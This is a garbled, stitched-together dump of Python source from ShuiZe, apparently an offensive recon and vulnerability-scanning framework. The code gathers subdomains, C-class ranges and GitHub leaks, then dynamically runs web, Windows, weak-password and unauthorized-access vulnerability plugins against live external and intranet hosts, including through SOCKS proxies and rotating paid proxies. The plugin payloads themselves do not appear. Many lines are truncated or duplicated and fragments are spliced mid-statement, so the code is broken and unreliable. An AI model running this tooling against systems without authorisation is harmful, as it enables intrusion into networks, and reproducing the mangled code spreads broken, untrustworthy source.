domain in list(set(list(Subdomains_ips.keys()) + ip2domainSubdomains)):
if ':' in subdomain: # ip2domainSubdomains的结果里有些类似于221.192.236.146:999这种结果,所以不加80端口
web_host_port_temp.append(subdomain)
else:
web_host_port_temp.append('{}:80'.format(subdomain))
from Plugins.infoGather.Intranet import getMoreIp
infoGather.webInfo import getWebTitle
域
创
反查域
print('[total: {}] ksubdomain: {}'.format(len(ksubdomains), ksubdomains))
print('len [{}]'.format(len(subdomains)))
print('[total: {}] theHarvester: {}'.format(len(theHarvesterSubdomains), theHarvesterSubdomains))
print('len [{}]'.format(len(subdomains)))
print('[total: {}] webAPI: {}'.format(len(othersApiTotalSubdomains), othersApiTotalSubdomains))
print('len [{}]'.format(len(subdomains)))
print('[total: {}] Github: {}'.format(len(githubApiSubdomains), githubApiSubdomains))
print('[total: {}] Spider: {}'.format(len(spiderSubdomains), spiderSubdomains))
print('[total: {}] Certs: {}'.format(len(certsSubdomains), certsSubdomains))
print('[total: {}] Friends: {}'.format(len(fcSubdomains), fcSubdomains))
print('C段的IP:{}'.format(CIP_List))
print(CIP_List)
print(Subdomains_ips)
print(notCDNSubdomains)
bdomain in notCDNSubdomains:
for ip in Subdomains_ips[subdomain]:
SubdomainAndNotCDNIPs.append(ip)
Space_web_host_port, webSpace_service_host_port = run_webSpace(domain, SubdomainAndNotCDNIPs, [], '')
else:
webSpace_web_host_port, webSpace_service_host_port = run_webSpace(domain, [], CIP_List, '') # 网络空间引擎(fofa、shodan)获取的开放web服务的host(IP/domain)
for subdomain in Subdomains_ips.keys():
for ip in Subdomains_ips[subdomain]:
allTargets_Queue.put(ip)
allTargets_List.append(ip)
print('[total: {}] ip2domainSubdomains: {}'.format(len(ip2domainSubdomains), ip2domainSubdomains))
print('[ip2domain get new subdomains] [{}]'.format(len(list(set(ip2domainSubdomains)-set(list(Subdomains_ips.keys()))))))
print('[total: {}] web_host_port'.format(len(web_host_port)))
n:
ret = ""
for cip in CIP_List:
ret += cip
ret += ","
cprint(r"请使用-c功能跑C段资产", 'green')
cprint(r"python3 ShuiZe.py -c {}".format(ret[:-1]), 'red')
print('[total: {}] web_host_port'.format(len(web_host_port)))
print('[total: {}] web_host_port'.format(len(web_host_port)))
print('[total: {}] web_host_port'.format(len(web_host_port)))
def sublist3rRun(domain):
domain = domain
threads = 30
savefile = None
ports = None
enable_bruteforce = False
verbose = False
engines = 'baidu, dnsdumpster, virustotal'
# print(domain, threads, savefile, ports, enable_bruteforce, verbose, engines)
if verbose or verbose is None:
verbose = True
banner()
sublist3rSubdomains = main(domain, threads, savefile, ports, silent=False, verbose=verbose, enable_bruteforce=enable_bruteforce, engines=engines)
return list(sublist3rSubdomains)
def Sublist3r():
print('[+] Load Sublist3r Subdomain ...')
from Plugins.infoGather.subdomain.Sublist3r.sublist3r import sublist3rRun
sublist3rSubdomains = sublist3rRun(domain)
return sublist3rSubdomains | null |
189,266 | import sys
import os
import urllib3
import openpyxl
from uuid import uuid4
import dns.resolver
import re
from threading import Thread
from IPy import IP
from collections import Counter
from queue import Queue
from urllib.parse import urlparse
from termcolor import cprint
from optparse import OptionParser
import os
import platform
from Plugins.saveToExcel import saveToExcel
from uuid import uuid4
import socket
import socks
import configparser
from tqdm import *
from colorama import Fore
import requests
from Plugins.infoGather.subdomain.subdomain3.brutedns import run_subdomains
from Plugins.infoGather.SocksProxy.getSocksProxy import run_getSocksProxy
from Plugins.infoGather.subdomain.beian2NewDomain.beian2domain import run_beian2domain
ns.infoGather.subdomain.Aiqicha.Aiqicha import run_aiqicha
from Plugins.infoGather.subdomain.ksubdomain.ksubdomain import run_ksubdomain
from Plugins.infoGather.subdomain.theHarvester.theHarvester import run_theHarvester
from Plugins.infoGather.subdomain.verifyEmails.VerifyEmails import run_verifyEmails
from Plugins.infoGather.subdomain.othersApiSubdomains.othersApiSubdomains import othersApiRun
from Plugins.infoGather.subdomain.githubSubdomains.githubSubdomains import githubApiRun
if os.path.exists(github_txt):
gitSensitiveInfo = get_GitSensitiveInfo(github_txt, raw_url_emails)
githubSheet.saveGithub(gitSensitiveInfo)
from Plugins.infoGather.subdomain.Sublist3r.sublist3r import sublist3rRun
ugins.infoGather.subdomain.Certs.crawlCerts import crawlCerts
ugins.infoGather.subdomain.FriendChins.crawlFriendChins import FriendChins
from Plugins.infoGather.subdomain.CDN import checkCDN
from Plugins.infoGather.subdomain.queryA import queryA
s.infoGather.subdomain.hostCollide import hostCollide
s.infoGather.ParamSpider.paramSpider import getParamLinks
import configparser
s.infoGather.WebspaceSearchEngine import fofaApi, shodanApi, quakeApi, qianxinApi
ins.infoGather.subdomain.ip2domain import getIp2Domain
一个i
s.infoGather.subdomain.ipAddress import getIpAddress
from Plugins.infoGather.Intranet import getMoreIp
tqdm.write(Fore.BLACK + '-' * 50 + 'scan_IntranetPorts ...' + '-' * 50)
tqdm.write(Fore.BLACK + '-' * 50 + 'get_IntranetHostName and IP ...' + '-' * 50)
tqdm.write(Fore.BLACK + '-' * 50 + 'run_getWebTitle ...' + '-' * 50) infoGather.webInfo import getWebTitle
域
sys.path.append(vul_path) List = filter(lambda x: (True, False)[x[-3:] == 'pyc' or x[-5:] == '__.py' or x[:2] == '__'],
os.listdir(vul_path))
for vulName in vulList:
tqdm.write(Fore.BLACK + '-' * 50 + 'detect ' + vulName[:-3] + '-' * 50) # 探测各种漏洞
md = __import__(vulName[:-3]) # 导入类
try:
if hasattr(md, 'Detect'):
detect = getattr(md, 'Detect') # 获取类
alive_Web_queue = Queue(-1) # 将存活的web存入队列里
for _ in alive_Web:
alive_Web_queue.put(_)
threads = []
if isIntranet == 1:
threadNum = 30 # 如果是扫内网,则线程为5
if vulName in intPassVul:
pass
else:
tqdm.write(Fore.BLACK + '内网不跑{}漏洞'.format(vulName))
continue
else:
threadNum = 100 # 扫外网则线程为300
# 使用快代理时,线程调整
if kuaidaili_thread_num:
threadNum = int(kuaidaili_thread_num)
pbar = tqdm(total=alive_Web_queue.qsize(), desc="检测Web漏洞", ncols=150) # total是总数
for num in range(1, threadNum + 1):
t = detect(alive_Web_queue, pbar, webVul_list, requests_proxies) # 实例化漏洞类,传递参数:存活web的队列, 存储漏洞的列表
threads.append(t)
t.start()
for t in threads:
t.join()
pbar.close()
except Exception as e:
tqdm.write(Fore.BLACK + r'[-] Load Vul [{}] Error: {}'.format(vulName, e.args))
continue
tqdm.write(Fore.BLACK + '-' * 50 + 'detect Web vul' + '-' * 50)
tqdm.write(Fore.BLACK + '-' * 50 + 'detect param vul' + '-' * 50) [] gins/Vul/Param/'
sys.path.append(vul_path) = filter(lambda x: (True, False)[x[-3:] == 'pyc' or x[-5:] == '__.py' or x[:2] == '__'],
os.listdir(vul_path)) ulName in vulList:
tqdm.write(Fore.BLACK + '-' * 50 + 'detect ' + vulName[:-3] + '-' * 50) # 探测各种漏洞
md = __import__(vulName[:-3]) # 导入类
try:
paramVul_list = md.detect(param_Links)
except Exception as e:
tqdm.write(Fore.BLACK + r'[-] Load Vul [{}] Error: {}'.format(vulName, e.args))
continue
return paramVul_lis ite(Fore.BLACK + 'service_host_port : {}'.format(service_host_port))
sys.path.append(unauthVul_path)
/Plugins/Vul/Win/'
sys.path.append(vul_path) = filter(lambda x: (True, False)[x[-3:] == 'pyc' or x[-5:] == '__.py' or x[:2] == '__'],
os.listdir(vul_path)) lName in vulList:
cprint('-' * 50 + 'detect ' + vulName[:-3] + '-' * 50, 'green') # 探测各种漏洞
md = __import__(vulName[:-3]) # 导入类
try:
if hasattr(md, 'Detect'):
detect = getattr(md, 'Detect') # 获取类
alive_host_queue = Queue(-1) # 将存活的主机存入队列里
for _ in alive_host_List:
alive_host_queue.put(_)
threads = []
if isIntranet == 1:
threadNum = 5 # 如果是扫内网,则线程为5
else:
threadNum = 200 # 扫外网则线程为300
for num in range(1, threadNum + 1):
t = detect(alive_host_queue, winVul_list, proxy) # 实例化漏洞类,传递参数:存活主机的队列, 存储漏洞的列表
threads.append(t)
t.start()
for t in threads:
t.join()
except Exception as e:
print(r'[-] Load Vul [{}] Error: {}'.format(vulName, e.args))
continue
创
反查域
def detect_paramVul(param_Links):
tqdm.write(Fore.BLACK + '-' * 50 + 'detect param vul' + '-' * 50) # 探测各种参数漏洞-注入
paramVul_list = [] # 存储参数漏洞,每个元素都是一个列表。[['SQL', 'http://127.0.0.1/a.php?id=1'], ['SQL', 'http://127.0.0.1/a.php?id=2']]
vul_path = os.getcwd() + '/Plugins/Vul/Param/'
sys.path.append(vul_path) # 添加环境变量
vulList = filter(lambda x: (True, False)[x[-3:] == 'pyc' or x[-5:] == '__.py' or x[:2] == '__'],
os.listdir(vul_path)) # 获取漏洞脚本
for vulName in vulList:
tqdm.write(Fore.BLACK + '-' * 50 + 'detect ' + vulName[:-3] + '-' * 50) # 探测各种漏洞
md = __import__(vulName[:-3]) # 导入类
try:
paramVul_list = md.detect(param_Links)
except Exception as e:
tqdm.write(Fore.BLACK + r'[-] Load Vul [{}] Error: {}'.format(vulName, e.args))
continue
return paramVul_list | null |
189,267 | import sys
import os
import urllib3
import openpyxl
from uuid import uuid4
import dns.resolver
import re
from threading import Thread
from IPy import IP
from collections import Counter
from queue import Queue
from urllib.parse import urlparse
from termcolor import cprint
from optparse import OptionParser
import os
import platform
from Plugins.saveToExcel import saveToExcel
from uuid import uuid4
import socket
import socks
import configparser
from tqdm import *
from colorama import Fore
import requests
cf.read("./iniFile/config.ini")
with open(github_txt, 'rt', encoding="utf-8", errors='ignore') as f:
content = f.readlines()
for line, each in enumerate(content):
if '[------------------] ' in each:
line_urls[str(line + 1)] = each.split('[------------------] ')[1]
():
cprint('-' * 50 + 'Load subdomains3 ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.subdomain3.brutedns import run_subdomains
():
cprint('-' * 50 + 'Load getSocksProxy ...' + '-' * 50, 'green')
from Plugins.infoGather.SocksProxy.getSocksProxy import run_getSocksProxy
socksProxysDict = run_getSocksProxy()
cprint('-' * 50 + 'Load beian2NewDomain ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.beian2NewDomain.beian2domain import run_beian2domain
cprint('-' * 50 + 'Load Aiqicha ...' + '-' * 50, 'green')
cprint("查询【{}】公司架构".format(companyName), 'red')
from Plugins.infoGather.subdomain.Aiqicha.Aiqicha import run_aiqicha
():
cprint('-' * 50 + 'check Pan-Analysis ...' + '-' * 50, 'green')
cprint('-' * 50 + 'Load ksubdomain ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.ksubdomain.ksubdomain import run_ksubdomain
():
cprint('-' * 50 + 'Load theHarvest ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.theHarvester.theHarvester import run_theHarvester
print(hosts)
* 50 + 'Load verifyEmails ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.verifyEmails.VerifyEmails import run_verifyEmails
cprint('-' * 50 + 'Load VirusTotal threatcrowd url.fht.im ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.othersApiSubdomains.othersApiSubdomains import othersApiRun
():
cprint('-' * 50 + 'Load Github Api Subdomain ...' + '-' * 50, 'green')
from Plugins.infoGather.subdomain.githubSubdomains.githubSubdomains import githubApiRun
if os.path.exists(github_txt):
gitSensitiveInfo = get_GitSensitiveInfo(github_txt, raw_url_emails)
githubSheet.saveGithub(gitSensitiveInfo)
print('[+] Load Sublist3r Subdomain ...')
from Plugins.infoGather.subdomain.Sublist3r.sublist3r import sublist3rRun
cprint('-' * 50 + 'Load Spider ...' + '-' * 50, 'green')
cprint('-' * 50 + 'Load crawlCerts ...' + '-' * 50, 'green') ugins.infoGather.subdomain.Certs.crawlCerts import crawlCerts
newDomains.extend(_newDomains)
ugins.infoGather.subdomain.FriendChins.crawlFriendChins import FriendChins
cprint('-' * 50 + 'check subdomains CDN and query ip ...' + '-' * 50, 'green')
print('Check CDN [{}] subdomains'.format(len(subdomains)))
from Plugins.infoGather.subdomain.CDN import checkCDN
print('Query the A record of [{}] subdomains'.format(len(subdomains)))
from Plugins.infoGather.subdomain.queryA import queryA
s.infoGather.subdomain.hostCollide import hostCollide
s.infoGather.ParamSpider.paramSpider import getParamLinks
> 1000:
paramLinks = []
cprint('-' * 50 + 'get_CIP ...' + '-' * 50, 'green')
CIP_List = []
for ip in list(set(ips)):
c_subnet = str(IP(ip).make_net('255.255.255.0')).rsplit('.', 1)[0] + '.0'
CIP_List_all.append(c_subnet)
global ip_count
ip_count = Counter(CIP_List_all)
cprint(ip_count, 'red')
import configparser
cf = configparser.ConfigParser()
cf.read("./iniFile/config.ini")
for ip in ip_count:
if ip_count[ip] > int(c_nums):
CIP_List.append(ip)
return CIP_List
CIP_List, fofaTitle):
cprint('-' * 50 + 'run_webSpace ...' + '-' * 50, 'green') s.infoGather.WebspaceSearchEngine import fofaApi, shodanApi, quakeApi, qianxinApi
for ip in list(set(ips)):
ip_C = str(IP(ip).make_net('255.255.255.0')).rsplit('.', 1)[0] + '.0'
fofaTitle_IPs.append(ip_C)
global ip_count
ip_count = Counter(fofaTitle_IPs)
newDomains.extend(fofaTitle_newDomains)ins.infoGather.subdomain.ip2domain import getIp2Domain
nd(_newDomains)
一个i
s.infoGather.subdomain.ipAddress import getIpAddress
cprint('-' * 50 + 'collation_web_host ...' + '-' * 50, 'green')
from Plugins.infoGather.Intranet import getMoreIp
infoGather.webInfo import getWebTitle
if isIntranet == 1:
threadNum = 10 # 如果是扫内网,则线程为5
else:
threadNum = 300 # 扫外网则线程为300
oxies = None
alive_Web = [] ach in web_Titles:
if each[1] != 65535:
alive_Web.append(each[0])
域
(alive_Web):
# 跑自己的漏洞脚本
def runSelfVul():
vul_path = os.getcwd() + '/Plugins/Vul/Web/'
cprint('-' * 50 + 'detect Windows vul' + '-' * 50, 'green')
创
ip_count):
反查域
print('[total: {}] ksubdomain: {}'.format(len(ksubdomains), ksubdomains))
print('len [{}]'.format(len(subdomains)))
print('[total: {}] theHarvester: {}'.format(len(theHarvesterSubdomains), theHarvesterSubdomains))
print('len [{}]'.format(len(subdomains)))
print('[total: {}] webAPI: {}'.format(len(othersApiTotalSubdomains), othersApiTotalSubdomains))
print('len [{}]'.format(len(subdomains)))
print('[total: {}] Github: {}'.format(len(githubApiSubdomains), githubApiSubdomains))
print('[total: {}] Spider: {}'.format(len(spiderSubdomains), spiderSubdomains))
bdomain in subdomains:
f.writelines('{}\n'.format(subdomain))
print('[total: {}] Certs: {}'.format(len(certsSubdomains), certsSubdomains))
print('[total: {}] Friends: {}'.format(len(fcSubdomains), fcSubdomains))
bdomain in subdomains:
f.writelines('{}\n'.format(subdomain))
_List = get_CIP(Subdomains_ips, CDNSubdomainsDict, censysIPS)
print('C段的IP:{}'.format(CIP_List))
run_cSubnet(CIP_List, Subdomains_ips, notCDNSubdomains, param_Links)
print(CIP_List)
print(Subdomains_ips)
print(notCDNSubdomains)
IPs) > 10:
SubdomainAndNotCDNIPs = []
Space_web_host_port, webSpace_service_host_port = run_webSpace(domain, SubdomainAndNotCDNIPs, [], '')
else:
webSpace_web_host_port, webSpace_service_host_port = run_webSpace(domain, [], CIP_List, '') # 网络空间引擎(fofa、shodan)获取的开放web服务的host(IP/domain)
print('[total: {}] ip2domainSubdomains: {}'.format(len(ip2domainSubdomains), ip2domainSubdomains))
print('[ip2domain get new subdomains] [{}]'.format(len(list(set(ip2domainSubdomains)-set(list(Subdomains_ips.keys()))))))
print('[total: {}] web_host_port'.format(len(web_host_port)))
= 0:
webVul_list = detect_webVul(alive_Web) # 获取C段资产
if domain:
# paramVul_list = detect_paramVul(param_Links) 不跑注入
paramVul_list = []
else:
paramVul_list = []
# 13. 未授权漏洞检测
unauthWeakVul_list = detect_unauthWeakVul(webSpace_service_host_port) # 获取C段资产
# unauthWeakVul_list = []
# 14. 打印并保存漏洞
Vul_list = webVul_list + unauthWeakVul_list + paramVul_list
printSave_Vul(Vul_list)
cprint(r'新的域名:{}'.format(newDomains), 'green')
cprint(r'C段IP:{}'.format(CIP_List), 'green')
cprint(r'资产信息保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
cprint(r'Github信息保存路径:{}/{}_github.txt'.format(save_fold_path, domain), 'green')
if domain:
ret = ""
for cip in CIP_List:
ret += cip
ret += ","
cprint(r"请使用-c功能跑C段资产", 'green')
cprint(r"python3 ShuiZe.py -c {}".format(ret[:-1]), 'red')
print('[total: {}] web_host_port'.format(len(web_host_port)))
cprint(r'新的域名:{}'.format(newDomains), 'green')
cprint(r'C段IP:{}'.format(CIP_List), 'green')
cprint(r'资产信息保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
cprint(r'Github信息保存路径:{}/{}_github.txt'.format(save_fold_path, domain), 'green')
ranetWeb():
print('[total: {}] web_host_port'.format(len(web_host_port)))
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
print('[total: {}] web_host_port'.format(len(web_host_port)))
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
for i in range(2, intranetServiceSheet.max_row + 1): # 遍历每行
eachline = []
for j in range(1, intranetServiceSheet.max_column + 1): # 遍历每列
eachValue = intranetServiceSheet.cell(row=i, column=j).value
if j == 3:
eachValue = int(eachValue)
eachline.append(eachValue)
service_host_port.append(eachline) # []
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
File = openpyxl.load_workbook(masNmapFile)
for i in range(2, masNmapSheet.max_row + 1): # 遍历每行
eachline = []
for j in range(1, masNmapSheet.max_column + 1): # 遍历每列
eachValue = masNmapSheet.cell(row=i, column=j).value
if j == 3:
eachValue = int(eachValue)
eachline.append(eachValue)
if 'http' in eachline[0]:
url = '{}://{}:{}'.format(eachline[0], eachline[1], eachline[2])
else:
url = 'http://{}:{}'.format(eachline[1], eachline[2])
web_host_port.append(url)
service_host_port.append(eachline)
# if 'http' in eachline[0]:
# url = '{}://{}:{}'.format(eachline[0], eachline[1], eachline[2])
# web_host_port.append(url)
# else:
# service_host_port.append(eachline)
cprint(r'保存路径:{}'.format('{}/{}.xlsx'.format(save_fold_path, excel_name)), 'green')
def banner():
banner = ''' __ ____ ___ ____
/ \ __ __ |__ | |_ ) |__ |
| () | \ \ / / / / / / /
\__/ /_\_\ /_/ /___| /_/ author:ske
脚本自带Linux版本的Nuclei和ksubdomain,如果是windows或者mac,需要自行更换版本。
Plugins/infoGather/subdomain/ksubdomain/ksubdomain.py
Plugins/Vul/Nuclei/NucleiApi.py
最好在配置文件里填入fofa、shodan、github、censys的API,这样效果最佳。
请一定要配置fofa的api~~~最好是高级会员
配置文件地址:iniFile/config.ini
'''
print(banner)
with open("versionFlag.txt", "rt", encoding="utf-8") as f:
now_version = f.read().strip()
try:
res = requests.get(url=version_url, headers=headers, timeout=10, verify=False)
new_version = res.text.strip()
# print("最新版本: \n{}".format(new_version))
if now_version == new_version:
cprint("目前版本最新", 'red')
else:
add_version = new_version.replace(now_version, "")
# cprint("更新内容如下:{}\n".format(add_version), "red")
cprint("目前版本非最新,建议及时更新...\n地址: https://github.com/0x727/ShuiZe_0x727/", 'red')
except Exception as e:
print('获取版本信息失败...')
it():
global domain, cSubnet, save_fold_path, excel, excel_name, excelSavePath, proxy, \
requests_proxies, isIntranet, xlsxFileWB, weak, CIP_List, allTargets_List, \
allTargets_Queue, masNmapFile, newDomains, ip_count, fofaTitle, ksubdomain, justInfoGather, socksProxysDict, kuaidaili_thread_num
# python3 %prog -n 1 -c 192.168.1.0,192.168.2.0 -p 1.1.1.1:1111 内网:使用代理扫描内网C段资产:web标题和漏洞
# proxychains4 python3 %prog -n 1 -f /result/2ddcaa3ebbd0/172.18.82.0.xlsx 内网:使用proxychains4代理扫描C段的服务漏洞:弱口令和未授权
# python3 %prog --mn masNmap.xlsx 外网:扫描masscan和nmap的结果
# python3 %prog -n 1 -c 192.168.1.0,192.168.2.0 -v 1 内网:使用wifi或者vpn的情况下扫web标题和漏洞
banner()
checkVersion()
usage = '\n\t' \
'python3 %prog -d domain.com\n\t' \
'python3 %prog -d domain.com --justInfoGather 1\n\t' \
'python3 %prog -d domain.com --ksubdomain 0\n\t' \
'python3 %prog -c 192.168.1.0,192.168.2.0,192.168.3.0\n\t' \
'python3 %prog -f url.txt\n\t' \
'python3 %prog -n 1 -c 192.168.1.0,192.168.2.0 -p 1.1.1.1:1111\n\t' \
'python3 %prog -n 1 -f url.txt -p 1.1.1.1:1111 --web 1\n\t' \
'python3 %prog -n 1 -c 192.168.1.0,192.168.2.0 -v 1\n\t' \
'proxychains4 python3 %prog -n 1 -f /result/2ddcaa3ebbd0/172.18.82.0.xlsx\n\t' \
'proxychains4 python3 %prog -n 1 -w 1 -f /result/2ddcaa3ebbd0/172.18.82.0.xlsx\n\t' \
'python3 %prog --mn masNmap.xlsx\n\t' \
'python3 %prog --mn masNmap.xlsx -w 1\n\t' \
'python3 %prog --fofaTitle 大学\n\t' \
'python3 %prog --domainFile domain.txt\n\t'
parse = OptionParser(usage=usage)
parse.add_option('-d', '--domain', dest='domain', type='string', help='target domain')
parse.add_option('-c', '--cSubnet', dest='cSubnet', type='string', help='target cSubnet')
# parse.add_option('--proxyFlag', dest='proxyFlag', type='int', default=0, help='0:No,1:kuaidaili,2:tencentcs') # 0不使用代理扫描,1使用快代理扫描,2使用腾讯云函数扫描
parse.add_option('-n', '--intranet', dest='isIntranet', type='int', default=0, help='Scan intranet value set to 1') # 扫描内网, 值为1扫内网, 默认为0
parse.add_option('-p', '--proxy', dest='proxy', type='string', default=None, help='Intranet proxy socks5 socks4') # 代理,socks5和socks4, 默认为None,可用于外网扫描,也可以用于内网扫描
parse.add_option('-f', '--file', dest='File', type='string', default=None, help='/result/2ddcaa3ebbd0/172.18.82.0.xlsx') # 扫描内网的服务漏洞-未授权和弱口令
parse.add_option('-w', '--weak', dest='weak', type='int', default=None, help='run weak password script') # 内网弱口令是否要跑
parse.add_option('-v', '--vpn', dest='vpn', type='int', default=None, help='Run in the case of vpn') # 在vpn的情况下跑
parse.add_option('--web', dest='web', type='int', default=None, help='detect web in Intranet') # 跑内网的web漏洞
parse.add_option('--mn', dest='masNmapFile', type='str', default=None, help='run masscan nmap result') # 跑masscan和nmap的结果
parse.add_option('--fofaTitle', dest='fofaTitle', type='str', default=None, help='run fofa title') # 跑fofa的title
parse.add_option('--domainFile', dest='domainFile', type='str', default=None, help='run domain title') # 跑多个域名
parse.add_option('--ksubdomain', dest='ksubdomain', type='int', default=1, help='not run ksubdomain') # 不使用ksubdomain跑子域名
parse.add_option('--test', dest='testDemo', type='int', default=0, help='if test=1 then run testDemo') # 测试某个功能
parse.add_option('--justInfoGather', dest='justInfoGather', type='int', default=0, help='just infoGather, not detect vul') # 只信息收集,不跑漏洞
parse.add_option('--getSocks', dest='getSocks', type='int', default=0, help='get socks') # 获取socks代理
options, args = parse.parse_args()
domain, cSubnet, isIntranet, proxy, File, weak, vpn, masNmapFile, fofaTitle, domainFile, web, ksubdomain, justInfoGather, testDemo, getSocks = options.domain, options.cSubnet, options.isIntranet, options.proxy, options.File, options.weak, options.vpn, options.masNmapFile, options.fofaTitle, options.domainFile, options.web, options.ksubdomain, options.justInfoGather, options.testDemo, options.getSocks
# 所有目标
allTargets_List = []
allTargets_Queue = Queue(-1)
# C段IP列表
CIP_List = []
# C段出现的IP个数
ip_count = Counter()
# 和目标资产相关联的新的根域名
newDomains = []
# 代理
socksProxysDict = {"baidu": [], "google": []}
print(domain, cSubnet, isIntranet, proxy, File)
# requests代理
# 内网代理
if proxy:
requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
# 外网代理
else:
cf = configparser.ConfigParser()
cf.read("./iniFile/config.ini")
# 快代理配置
kuaidaili_tunnel = cf.get('kuaidaili', 'tunnel')
kuaidaili_username = cf.get('kuaidaili', 'username')
kuaidaili_password = cf.get('kuaidaili', 'password')
kuaidaili_thread_num = cf.get('kuaidaili', 'thread_num')
kuaidaili_switch = cf.get('kuaidaili', 'switch')
if kuaidaili_switch == "on":
requests_proxies = {
"http": "http://%(user)s:%(pwd)s@%(proxy)s/" % {"user": kuaidaili_username, "pwd": kuaidaili_password, "proxy": kuaidaili_tunnel},
"https": "http://%(user)s:%(pwd)s@%(proxy)s/" % {"user": kuaidaili_username, "pwd": kuaidaili_password, "proxy": kuaidaili_tunnel}
}
cprint('-' * 50 + 'Detect kuaidaili Config'.format(domain) + '-' * 50, 'green') # 验证代理是否有效
try:
kuaidaili_ips = []
for i in range(3):
res = requests.get(url='https://www.taobao.com/help/getip.php', proxies=requests_proxies, timeout=10, verify=False)
print(res.text)
ip = re.findall(r'ip:"([\d\.]+)"', res.text)[0]
print("此次请求IP: {}".format(ip))
kuaidaili_ips.append(ip)
if len(kuaidaili_ips) == 3:
cprint("快代理配置验证通过", 'red')
else:
cprint("快代理配置验证失败", 'red')
exit()
except Exception as OSError:
print("快代理配置错误或者快代理请求超时,请检查 {}".format(OSError.args))
exit()
else:
requests_proxies = None
# 分割C段,获取ip
if cSubnet:
CIP_List = cSubnet.split(',')
for CIP in CIP_List:
for ip in IP('{}/24'.format(CIP)):
allTargets_Queue.put(str(ip))
allTargets_List.append(str(ip))
# 扫描外网时加载文件扫描
if File and not isIntranet:
with open(File, 'rt') as f:
for each in f.readlines():
allTargets_Queue.put(each.strip())
allTargets_List.append(each.strip())
# 创建目录
# 扫描内网漏洞(Web或者服务)
if File and isIntranet:
if not web: # 扫描内网服务漏洞
save_fold_path, _excel_name = File.rsplit('/', 1)
excel_name = _excel_name.rsplit('.', 1)[0] + '_ServiceVul'
xlsxFileWB = openpyxl.load_workbook(File) # 打开文件
else: # 扫描内网web漏洞
save_fold_path = os.getcwd() + '/result/' + str(uuid4()).split('-')[-1] # 保存路径
os.makedirs(save_fold_path)
with open(File, 'rt') as f:
for each in f.readlines():
allTargets_Queue.put(each.strip())
allTargets_List.append(each.strip())
# 扫描外网或者外网读取file.txt或者读取masNmap.xlsx时
else:
try:
save_fold_path = os.getcwd() + '/result/' + str(uuid4()).split('-')[-1] # 保存路径
os.makedirs(save_fold_path)
except Exception:
pass
excel = openpyxl.Workbook()
excel.remove(excel[excel.sheetnames[0]]) # 删除第一个默认的表
if domain and cSubnet:
cprint('Error: domain and cSubnet can only pass one', 'red')
exit(0)
elif domain and not cSubnet: # 跑域名
cprint('-' * 50 + 'Start {} information collection'.format(domain) + '-' * 50, 'green')
excel_name = domain
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
run_subdomain()
elif not domain and cSubnet: # 跑C段
if isIntranet == 0: # 外网C段
cprint('-' * 50 + 'Start {} cSubnet collection'.format(cSubnet) + '-' * 50, 'green')
excel_name = cSubnet
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
print('C Subnet: {}'.format(CIP_List))
run_cSubnet(CIP_List, {}, [], [])
elif isIntranet == 1:
if proxy or vpn: # 内网C段的扫描
cprint('-' * 50 + 'Start {} cSubnet intranet scan'.format(cSubnet) + '-' * 50, 'green')
excel_name = cSubnet
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
print('C Subnet: {}'.format(CIP_List))
run_intranet_cSubnet()
else:
cprint('Error: Please pass in the agent when scanning the intranet', 'red')
elif File:
if isIntranet and not web: # 扫描内网的服务漏洞
cprint('-' * 50 + 'Open {} Scanning for service vulnerabilities on the intranet'.format(File) + '-' * 50, 'green')
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
print('xlsxFile: {}'.format(File))
run_intranet_ServiceVul()
elif isIntranet and web: # 扫描内网Web漏洞
cprint('-' * 50 + 'Open {} Scanning for intranet Web vulnerabilities'.format(File) + '-' * 50, 'green')
excel_name = str(uuid4()).split('-')[0]
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
run_intranetWeb()
else: # 扫描外网漏洞
cprint('-' * 50 + 'Open {} Scanning'.format(File) + '-' * 50, 'green')
excel_name = str(uuid4()).split('-')[0]
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
print('open File: {}'.format(File))
run_file()
elif masNmapFile: # 跑masscan和nmap的结果
cprint('-' * 50 + 'Open masNmap File {} to Scanning'.format(masNmapFile) + '-' * 50, 'green')
excel_name = str(uuid4()).split('-')[0]
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
run_masNmap()
elif fofaTitle: # 跑fofa Title漏洞
cprint('-' * 50 + 'Run Fofa Search Title {} to Scanning'.format(fofaTitle) + '-' * 50, 'green')
excel_name = str(uuid4()).split('-')[0]
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
run_fofaTitle()
elif domainFile: # 跑域名文件
cprint('-' * 50 + 'Run Domain File {} to information collection'.format(domainFile) + '-' * 50, 'green')
with open(domainFile, 'rt') as f:
for each in f.readlines():
# C段IP列表
CIP_List = []
# C段出现的IP个数
ip_count = Counter()
# 和目标资产相关联的新的根域名
newDomains = []
domain = each.strip()
cprint('-' * 50 + 'Start {} information collection'.format(domain) + '-' * 50, 'green')
excel_name = domain
excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
excel = openpyxl.Workbook()
excel.remove(excel[excel.sheetnames[0]]) # 删除第一个默认的表
run_subdomain()
elif testDemo == 1:
# 测试代码
# domain = ''
# save_fold_path = os.getcwd() + '/result/' + str(uuid4()).split('-')[-1] # 保存路径
# os.makedirs(save_fold_path)
# excel_name = domain
# excelSavePath = '{}/{}.xlsx'.format(save_fold_path, excel_name)
#
# CIP_List = []
# Subdomains_ips = {}
# notCDNSubdomains = []
